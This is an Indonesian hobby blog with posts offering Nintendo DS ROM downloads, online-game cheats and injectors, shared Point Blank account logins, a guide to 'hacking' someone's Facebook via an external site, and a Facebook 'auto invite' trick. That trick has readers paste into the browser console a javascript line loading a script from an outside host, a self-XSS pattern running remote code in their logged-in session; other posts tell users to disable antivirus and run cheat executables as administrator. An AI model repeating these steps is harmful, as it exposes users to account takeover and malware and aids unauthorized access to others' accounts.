Jumat, 21 Februari 2014

Download Game Harvest Moon 2 Geratis 2014

Posted by Riski maulana ibrahim Jumat, Februari 21, 2014, under | 2 comments

Siapa gak kenal harvest moon?? game buatan jepang ini memang game yang paling laris.Kali ini saya akan memberikan game harvest moon untuk handheld nintendo ds
A.Harvest moon ds
Harvest Moon DS adalah merupakan game RPG yang mengusung tema pertanian dan kehidupan bermasyarakat. Dalam Harvest Moon bisa berlatih mengenali seputar informasi tanaman dan cara menanam berbagai macam bibit tanaman. Tentu saja ini termasuk game RPG yang sangat populer di kalangan para gamer.

Biasanya ada banyak sekali walkthrough yang tersebar di internet seputar game Harvest Moon DS. Bagaimana cara untuk menikah, bagaimana cara untuk mencari cinta dari gadis yang ada di desa, atau bagaimana cara bersahabat dengan masyarakat sekitar.
Kisahnya bermula saat ada persilisihan antara harvest goddess dan witch princess dan tak sengaja witch princess mengutuk harvest goddess menjadi batu dan melemparkan harvest sprite dan harvest goddess ke luar angkasa
Disini nih tempat download romnya
DOWNLOAD
B.Harvest moon cute ds
Sama seperti hm ds tetapi bedanya kita memakai karakter cewek
Disini nih tempat download romnya
DOWNLOAD
 C.Harvest moon island of happiness
harvest moon island of happiness dimulai saat kamu terdampar di suatu pulau kapalmu rusak karena badai ternyata bukan kamu saja yang ada di pulau ini ada Taro dan keluarganya.Tugas mu adalah membuat pulau ini menjadi terkenal.di game ini kamu dapat memilih karakter antara cewek atau cowok
Disini nih tempat downloadnya
DOWNLOAD
D.Harvest moon sunshine island
kelihatannya ini sekuel kedua dari hm: island of happiness.Bedanya game ini dengan hm: island of happiness game ini bisa memakai keypad dan juga bisa memakai stylus
Disini nih tempat downloadnya
DOWNLOAD
E.puzzle de harvest moon
Ya game ini bukan game harvest moon yg biasa game ini tidak mempunyai alur cerita.hanya puzzle game,tetapi ini game puzzle biasa ini game puzzle yg unik
ini nih tempat downloadnya
DOWNLOAD
F.Harvest moon frantic farming
game ini sekuel keduanya dari puzzle de harvest moon.Bedanya game ini dengan sekuel sebelumnya adalah game ini sudah ada alur ceritanya.
Kisahnya berawal saat sunny island ditumbuhi oleh banyak tumbuhan dan para penduduk mencoba memperbaiki pulau ini
Ini nih tempat downloadnya
DOWNLOAD
G.Harvest moon Grand bazar
Di game ini kita mempunyai karakter baru,cerita baru,dan karakter utama baru
Game ini menceritakan tentang sebuah kota yang terkenal karena bazarnya tetapi akhir-akhir ini kota ini sepi yg berkunjung.Tugasmu adalah membuat kota ini terkenal lagi dengan menjual produk-produk hasil pertanianmu
Disini nih tempat downloadnya
DOWNLOAD
 H.Rune factory:a fantasy harvest moon
Game ini bermula saat Raguna (kamu dapat menamainya) bangun di desa yg tidak familiar ternyata dia terkena amnesia dan kamu bertemu seorang perempuan,mist yg membantu dan memberimu kebun.Game ini agak sedikit berbeda dari game harvest moon lainnya karena di game ini kamu dapat memburu monster.
Ini nih tempat downloadnya
DOWNLOAD
I.Rune factory 2:a fantasy harvest moon
Game bermula saat kyle(kamu bisa menamainya) Tiba di sebuah desa yg bernama Alvarna village dan bertemu seorang perempuan dia memberikanmu sebuah kebun
Disini nih tempat downloadnya
DOWNLOAD
J.Rune factory 3:a fantasy harvest moon
Kalau yang ini anda yang paling seru nih. Game ini menceritakan seorang pemuda bernama Micah yang Amnesia. Pemuda ini dapat berubah menjadi wolly. Untuk lengkapnya download aja deh
disini nih tempat downloadnya
DOWNLOAD LINK FILE SONIC
DOWNLOAD
DOWNLOAD LINK MEDIAFIRE
DOWNLOAD

K. Harvest Moon : Tale Of two Town
harvest moon twin villages import f Bokujo Monogatari: Futago no Mura (Harvest Moon Twin Villages) (J)
Untuk yang satu ini kesini aja soalnya terpisah

Nah semua game ini akan jalan jika memakai emulator nih tempat download emulatornya
Download emulator

Bobol Facebook Orang Lain 2014 | Man3tan Green school

Posted by Riski maulana ibrahim Jumat, Februari 21, 2014, under | 1 comment

Assallamuala'ikumm
Selamat pagi Teman-teman Green school.
dah lama gak update nih... semuanya....!!,Berjumpa lagi di blog Riski Maulana X.8 yang kacau ini, Sebelumnya, Bagaimana pada khabar kalian, pengunjung maupun sesama bloger MWB, Mudah-mudahan pada sehat-sehat aja.!!! AMIINN.
Baiklah pada kesempatan kali ini , saya akan sedikit berbagi kepada semuanya tanpa terkecuali "Asalkan Ada Kemauan" yaitu tentang Cara termudah dan terbaru hack atau bobol facebook Teman, update 2014, Atau anda sudah tahu,? Tapi kalau belum tahu, mari merapat dan di cermati dengan seksama.

Langkah awal


¤¤Anda harus Log in dullu ke akun facebook masing-masing.

Langkah ke dua


¤¤Siapkan mangsa atau akun facebook yang mau di hack.
¤¤Sebaiknya di pertimbangkan dullu "Sebab dan akibat" dari tindakan anda.

Langka ke tiga


¤¤Sebelum mulai, alangkah baiknya anda memakai PC(komputer), laptop, dan sejenisnya..hal ini di perlukan agar Loading hack berjalan lancar Dan complete.!
¤¤Bagi para pengguna Opera mini Khususnya Os,symbian..Jangan mengaktifan tampilan mobile vew pada settingan opera mini, Dan memakai Opera mini yang versi 5 ke atas,

langkah akhir


¤¤Masuk ke facebook ,cari mangsa yang mau di hack, klik profilnya dan Copy link yang ada di Addres bar browser anda.Sebagai contoh:https://www.facebook.com/febriyantimoutt ,Setelah itu masuk ke Sini , Dan Fastekan link tersebut pada area Url yang tersedia, dan terakhir klik Hack Acount, tunggu sampai Complete..

nah itu dia teman caranya, kalau ngerti pasti mudah, kalau minder pasti tidak karuan..Hehe
Warning: Semua yang ada pada postingan ini, tidak ada unsur untuk menyuruh anda melakukan sesuatu, Saya cuma NGAJARIN BUKAN NGANJURIN ingat itu!!!
baiklah kalau begitu teman, saya hatur famit dullu, mohon maaf bila ada kata-kata yang kurang bijak,

Wassallam dari saya Riski Maulana I

Selasa, 29 Januari 2013

Bagi bagi Car Ls dan PB

Posted by Riski maulana ibrahim Selasa, Januari 29, 2013, under | 4 comments

CHAR MAJOR, LET.COL, COLONEL POINT BLANK

CHAR POINT BLANK GRATIS.
MAJOR, LETKOL, KOLONEL Dan PERWIRA TINGGI

MAJOR

Major


MAJOR
Posting terbaru ini sedikit berbeda dengan post yang lalu.
Pesan :
Untuk mendapatkan ID dan Passwordnya anda harus terlebih dahulu mendownloadnya. Link downloadnya sudah tersedia di bawah.
New update_NOPEMBER 2011
1. Id :KLIK disini
Password :KLIK DISINI
2. Id :KLIK DISINI
Password :KLIK DISINI
^
^
^
^
^
Major Grade One
1.
ID : KLIK DISINI
Pass : rafofo1klik
2.
ID : KLIK DISINI
Pass : .*..*..*..*..*..*.
NEW UPDATE DESEMBER 2011
3. ID: Klik to download
PASS : 2010jack


LETNAN COLONEL GRADE 1 (no.1)
Update tgl 6 Mei 2011 pkl 09.29 wib
ID : Purching
Pass : medan234 diambil
LETNAN COLONEL GRADE 1 (no.2)
Update tgl 15 Mei 2011 pkl 20.03 wib
ID : Menteri222
Pass : inggrisraya diambil
LETNAN COLONEL GRADE 2 (no.1)
Update tgl 20 Mei 2011 pkl 22.57 wib
ID : Skakmat
Pass : pionmakanpion diambil
LETNAN COLONEL GRADE 5 (no.1)
Update tgl 25 Mei 2011 pkl 15.30 wib
ID : Lainarah3
Pass : 0ompong0x diambil
UNTUK MELIHAT NEW UPDATE CHAR LT.COL SELANJUTNYA KLIK DISINI

lt.col

CHAR LETNAN COLONEL

Posting terbaru ini sedikit berbeda dengan post yang lalu.
Pesan :
Untuk mendapatkan ID dan Passwordnya anda harus terlebih dahulu mendownloadnya. Link downloadnya sudah tersedia di bawah.
NEW UPDATE OKTOBER
1. ID: KLIK DISINI
PASS : KLIK DISINI
2. ID: KLIK DISINI
PASS : KLIK DISINI
NEW UPDATE 2013
3. ID : Klik to download
PASS : merauke
thanks


COLONEL GRADE 1 (no.1)
Update tgl 15 Mei 2011 pkl 19.56 wib
ID : Kayuapi
Pass : satunusa diambil
COLONEL GRADE 1 (no.2)
Update tgl 20 Mei 2011 pkl 23.02 wib
ID : Robotic212
Pass : 1lmen0202 diambil
UNTUK MELIHAT NEW UPDATE CHAR COLONEL KLIK DISINI

col

CHAR COLONEL

Posting terbaru ini sedikit berbeda dengan post yang lalu.
Pesan :
Untuk mendapatkan ID dan Passwordnya anda harus terlebih dahulu mendownloadnya. Link downloadnya sudah tersedia di bawah.
NEW UPDATE NOPEMBER
1. ID :KLIK DISINI
PASS :KLIK DISINI
2. ID :KLIK DISINI
PASS :KLIK DISINI
3. ID : Klik to download
PASS (klik per karakter): .*..*..*..*..*..*..1.
new update 2013
4. ID : Klik to download

Rabu, 28 November 2012

Cheat CrossFire November 2012 (Work Khusus November) Editor Riski Maulana

Posted by Riski maulana ibrahim Rabu, November 28, 2012, under | No comments


3. Apabila windows 7 cara penggunaaan jangan asal main klik klik saja...
Buka Cheatnya - Gunakan klik kanan - Run As Administrator
Buka CF nya - Klik kanan - Run As Administrator

Editor: 

Riski Maulana Ibrahim ( Deltam)


Features:
  • Check Screnshot D3d menu
On : Panah kanan | right Arrow
Off: Panah kiri | Left Arrow
Pilih cheat : panah atas dan bawah   | Up and Down Arrow
Insert : On/OFF menu!

Windows 7 :
Gunakan Klik Kanan - Run As administrator saat membuka cheat dan Crossfirenya! 

Tutorial : 
  • Buka Cheat / Open Cheat
  • Nunggu 5 Detik / Wait for 5 second
  • Click SKIP Ad for Adfly
  • Buka CF / Open Crossfire
  • START CCrossfire
Credit sudah tertera di injextnya 

Jumat, 19 Oktober 2012

cara cepat invite teman ke dalam grup facebook 2012

Posted by Riski maulana ibrahim Jumat, Oktober 19, 2012, under | No comments

- Akhir-akhir ini saya sering kesal karena Facebook saya tiba-tiba mendapatkan banyak notifikasi yang intinya telah di undang masuk ke dalam group facebook.

Jika grup bagus sih tidak masalah, sayangnya sudah grup tidak jelas dan banyak spam bertebaran pula. Dan facebook secara default meng ON kan notifikasi masuk baik di facebbok sendiri atau ke email, sehingga mau tidak mau kita harus membuang notifikasi tersebut baik yang di email maupun faceook kita.

Karena kekesalan tersebut di artikel kali ini saya akan membagi cara cepat menambahkan anggota grup facebook atau cara cepat invite teman masuk grup fb. Bagaimana cara invite friends secara cepat bahkan kilat? Kita simak caranya di bawah ini.


Cara Cepat Menambahkan Anggota Grup Facebook

Cara cepat Tambah Anggota Group / Auto Invite Friends to Group

Untuk Browser Mozilla Firefox
1. Tekan CTRL + SHIFT + K
2. Copy paste kode berikut kedalam jendela yang muncul
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';})();
3. Lalu tekan enter, lalu tunggu sebentar dan semua teman sudah di undang.


Test Di Grop Ini ----->>>> Grop INI

Untuk Browser Chrome
1. Klik Kanan Mouse
2. Pilih Inspect Element and Console
3. Copy paste kode berikut kedalam jendela yang muncul

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';})();
4. Lalu tekan enter, lalu tunggu sebentar dan semua teman sudah di undang.

Test Di Grop Ini ----->>>> Grop INI

Itulah cara cepat invite teman ke dalam grup facebook dan perlu di ingat jika anda menggunakan ini bersiap-siaplah di Unfriend oleh teman anda.





Cara Cepat Invit Ke dalam Grup Facebook | Auto Invit Temen Sampai Rebuan Ke Group |Cara Cepat Invit Ke dalam Grup Facebook | Auto Invit Temen Sampai Rebuan Ke Group |Cara Cepat Invit Ke dalam Grup Facebook | Auto Invit Temen Sampai Rebuan Ke Group |Cara Cepat Invit Ke dalam Grup Facebook | Auto Invit Temen Sampai Rebuan Ke Group |Cara Cepat Invit Ke dalam Grup Facebook | Auto Invit Temen Sampai Rebuan Ke Group ||Cheat invit 2012

Selasa, 14 Agustus 2012

Amazon.co.jp Box | Amazon Box Wallpaper

Posted by Riski maulana ibrahim Selasa, Agustus 14, 2012, under | 3 comments

Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You

Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I                  
 Wallpaper Amazon Box| Amazon Box Galau | Amazon Box Love | Amazon Box Sedih | Amazon Box Keren | Amazon Box Wallpaper | Amazon Box | Amazon Box Mazing | Amazon Box I Love You
                                
Halooo readeersku tersayaang! (pada muntah) XD kemaren pas lagi iseng nyari-nyari foto suami [?] (baca: jaejin) gue ga sengaja nemu foto-foto yang gue upload diatas. ahhh lucu banget yaa! ya namanya juga cuman iseng, jadi postnya iseng juga XD ahh pokoknya iseng deh temanya! haha just enjoyed it yaa! hehehe ^_^v

Minggu, 29 Juli 2012

Cheat Like Status Facebook Boom Like Free 2012

Posted by Riski maulana ibrahim Minggu, Juli 29, 2012, under | 22 comments

Cara Agar Status Facebook Mendapat Ribuan Like (works) -
Senang rasanya jika setelah update status langsung mendapat banyak like apalagi sampai ribuan like. Dan kali ini saya akan memposting tentang cara agar status kita mendapat ribuan LIKE meskipun teman facebook kamu gak sampe ribuan heehe, 
caranya Klik Link berikut: http://www.facebook.com/connect/prompt_feed.php , tulis status kamu, lalu klik share/terbitkan, dan jreng jreng lihat status kamu :)
seperti ini hasilnya:

JANGAN LUPA ALL JOIN IYE BLOG INI DAN KOMENT POSTING INI TANKS

Cheat Ayo Dance 29 July 2012 Auto Story Inside Outside v.6082

Posted by Riski maulana ibrahim Minggu, Juli 29, 2012, under | No comments



Downloads Cheat
Tanpa Password
Created :
[-]kinyo

Tutorial Pemakaian Cheat Ini
- Download Hingga Unduhan Selesai
- Extract Files To Desktop
- Copy 045.ACV ke Folder Ayodance
-Cek cara menggunakan perx di bawah!!
- Login Audition Ayodance
- Ambil Story Inside Contoh Nomer 100
- Pas NPC Bacot / Tulisan NEXT Tekan Hotkey : F5
- DONE !

Kalau OUTSIDE
- Ambil Story
- Buat Room Dengan PASSWORD
- Ganti Lagu 1BPM
- Click Buku Story , Tekan HOTKEY : F4
- DONE !

Cara Pakai  cara menggunakan perx di bawah!!
Injector Bisa pkai Perx Download disini
  1.  Buka Perx Injector
  2. ganti Injecnya dengan Audition.exe
  3. lalu browse Plih DLL yg barusan anda download
  4. Kemudian buka Audit mu
  5. Play saja
Klo di bawah hack lostsaga , kalau audition yah tinggal ganti saja audition.exe

Cheat CSO FullHack

Posted by Riski maulana ibrahim Minggu, Juli 29, 2012, under | 3 comments

Pekenalkan nama saya agung Rizkinianto, saya Admin baru CSO Disini,,,  Buat perkenalan saya,, kali ini saya share fullhack cheat CsO internasional..   Ssilahkan coba dibawah..






Download Cheat



Petunjuk Pemakaian :

pastikan antivirus semua dimatikan dulu, ini softwarenya sebenarnya free virus.
cuman karena butuh koneksi internet, antivirus bakalan anggap sebagai virus.

1. Extract File .rar nya
2. Jalankan file CSOloader.exe
3. Masukkan path direktori instalasi CS kamu, pilih file launcher cs kamu di folder "Bin"
4. Tunggu beberapa saat hingga tombol "RUN CS gogogo" di bagian atas bisa diklik. kalau tidak bisa diklik kamu mesti klik salah satu iklan yang muncul di bagian tengah.
5. Setelah klik tombol RUN CS, tunggu hingga CSnya jalan. Biasanya jika pertama kali membuka program ini, sebelum masuk dialog login ID bakalan stuck atau nyangkut. nanti di ALT TAB saja pilih dialog informasi driver graphic kamu dan klik OK. Ulangi lagi petunjuk nomor 2. biasanya disuruh nunggu lagi untuk meng-close program cheatnya.

untuk key command-nya :

Numpad 1 : Fog
Numpad 2 : Lambert(Terang atau tidaknya Caracter Musuh(saat WH))
Numpad 3 : Light(mode Tembok/map)ada yg Terang, Normal ataupun Tanpa Warna
Numpad 4 : Wallhack(Active/Nonactive WH)
Numpad 5 : Smoke (Antismoke Non active/diactive)
Numpad 6 : Flash(anti flashbang Active/nonactive)
Numpad 7 : DotColor( Merubah warna Dotsight(no Crosshair))
Numpad 8 : Dotsize (Ukuran Dotsight)
Numpad 9 : Menu (active Nonactive)
Numpad 0 : Aimbot ( hanya Untuk Nvidia)
Numpad * : Aim target (Dotsight yang ada di atas Caracter)
Numpad + : JK Zoom( Ngezoom senajta No Sniper)
Note : [AimTarget]1.TE 2.CT 3.Caracther Baru 4.Zombie



apabila mengalami error cso_gg88.dll bisa download file ini

Note : jangan di Alt+tab atau window mode, bakalan ilang cheatnya

Note : Untuk Speed hack ketika anda membuka CSOLoader.exe nya di sebelah kiri kan ada Speed hack .. nah centang itu ..
kan ada hotkey nya tuh bisa pilih E,Ctrl,Alt dan Shift...
nah silah kan pilih ..
pas di dalam game tekan F2 untuk mengaktifkan lalu tekan Hotkey yang kamu pilih antara E , Shift dll...
bisa nembak make sniper berkali kali .. jder jder jdeerr...

Happy Cheating!!
Ingat kalau cheat nya gak bisa lagi balik kesini ya ..
update :D

Cheat Dragon Nest 29 July 2012 Menu Hack

Posted by Riski maulana ibrahim Minggu, Juli 29, 2012, under | 1 comment

New Fullhack mode

Don't to Show OFF
Downloads Cheat
No Password

 Injector dapat menggunakan ini  : DOWNLOAD injector disini

Credit by TwinSaga

Build with CheatEngine

Fitur :
[-] No CoolDown
[-] WallHack
[-] No Animation

Tutor :
Altivekan setelah update HS, dengan cara mencentang Menu Hack
Bisa juga dalam keadaan game berjalan ^^

On : Centang List Menu
Off : Hilangkan CekList
Aktifinnya saat keluar Hackshield ya!

Tutor >

  1.     Buka Injector Kesayangan Anda target " DragonNest.exe "
  2.     Buka Louncher DN
  3.     play/Start ,, 
  4.     Happy Cheat All Fitur Auto On

Cheat Point Blank 29 July 2012 Menu 3 D

Posted by Riski maulana ibrahim Minggu, Juli 29, 2012, under | No comments

Versi RH Paling Ampuh Musnah Musuh.!!!!

Don't to show OFF
Tanpa Password
[ D3D Menu ]
  • Wallhack
  • Chams
  • AMMo
  • ESP
  • 1 Hit
  • Burst
  • Skill
  • Gm
  • No LAG system
  • MOVe speed
  • 2 Hit SG  [ALL SG] bahkan bisa 1 hit
  • QQ 
  • No V recoil
  • no h recoil
  •  No respon
  • Set hollow killer
  • DEFEND HACK
Options
  • Menu DISPLAY
  • Exit

 Cara setting brust yah gak usah pakai cheat dlu atuh kang,,,main pb sepert biasa dlu ,, setting ,bru keluar lagi dan coba pakai ,,,okay pham kan!
Settingan brust 1000% No LAG!

Hotkeys D3D Menu: 
  • D3d Menu On/OFF : INSERT
  • Arah Panah kanan = ON
  • Arah Panah Kiri OFF
  • Arah Panah ats & Bawah Pilih cit
Tutorial : 
  1. Buka PB launcher
  2. Buka Cheat
  3. Start
  4. Keluar Message Box/notice
  5. Ok,ok saja Hepii Cheatting dah 
Keterangan : BUAT WINDOWS 7 and Windows Vista
-Buka Cheat Jangan Menggunakan DOUBLE klik!!!
-Tapi menggunakan Klik kanan -Runadministrator
-Buka PB nya pun jangan pakai Double Klik
-Tapi menggunakan Klik kanan -Runadministrator juga
Okay paham KAN

Cheat Dragon City July 2012

Posted by Riski maulana ibrahim Minggu, Juli 29, 2012, under | No comments

Cheat Dragon City Farm Hack 2012

 
Tools :
[-] Browser ( Mozilla Firefox , Google Chrome)
[-] Cheat Engine [C.E]


1.Go ke Dragon City di facebook 2.Open CE (Cheat Engine)3.Click Mini cpu ikon di kiri atas cheat engine atau kotak kecil di bawah tab berkas4.Select-plugin_container.exe (firefox) atau chrome.exe (google chrome) di bawah rundll32.exe5.Value jenis dari 4byte untuk AOB6.Scan '46 41 52 4D 00 00 00 00 00 00 00 00 00 00 00 00 'berubah menjadi: 44 72 61 67 6F 6E 73 00 00 47 65 74 20 33 30 208. membangun pertanian dan melihat Batas jumlah Pertanian9.HAVE FUN 
Penjelasan GINI KAMU SCAN(46 41 52 4D 00 00 00 00 00 00 00 00 00 00 00 00 ) TANPA KURUNG =LALU KAMU SERET SEMUA VALUE KE BAWAHSESUDAH ITU KAMUUBAH VALUE NYA( 44 72 61 67 6F 6E 73 00 00 47 65 74 20 33 30 20 )TANPA KURUNGLALU KAMU VISIT TEMEN KAMU BALIK LAGI KE PULAU KAMUKAMU AMBIL BUIL KAMU KLIK FARM

Dragon City Cheats – Habitat Hacks
1.Go to Dragon City on facebook - click here
2.Open CE (Cheat Engine)
3.Click mini cpu icon at the top left of cheat engine or the small box under file tab
4.Select -plugin_container.exe(firefox) or chrome.exe(google chrome) under rundll32.exe
5.Value type from 4byte to text
6.Scan ‘HABITAT’
change to: infinite
8. 5.go visitt your friend then back to your city! build Habitat As many you want!!
9.HAVE FUN

Sabtu, 28 Juli 2012

Download Template Hacker Free Untuk Blog

Posted by Riski maulana ibrahim Sabtu, Juli 28, 2012, under | 1 comment

Download Template :
Click Here
View Live Demo :

Fiture :
[-] Transparent Template 
[-] Blue Matrix Background
[-] Music Player
[-] Auto Read More

Cara Pasang:
1. Download dulu dari MFR Data
2. Extract file .exe menjadi folder.
3. Masuk ke Blogger kamu.
4. Lalu menuju "Rancangan".
5. Centang "Expand Template Widget"
6. Pada Backup/Restore Template, pilihlah browse.
7. Ambil file "Template HC" dan unggah.
8. Jika ada Notice pilih "Pertahankan" dan selesai.

Bagi yang belum Tau cara download di Uploadic Bisa Lihat Disini
Untuk Downloads Cheat Klik Tombol Skip Ad Yang Ada di Sebelah kanan atas(Biasanya nunggu 7 Detik)

Related Posts Plugin for WordPress, Blogger...
Related Posts Plugin for WordPress, Blogger...
Related Posts Plugin for WordPress, Blogger...

Tags

.

 
cursor: url("https://picasaweb.google.com/110667291707517219649/IMAGETUTORIAL2#5729338440284600194"), default;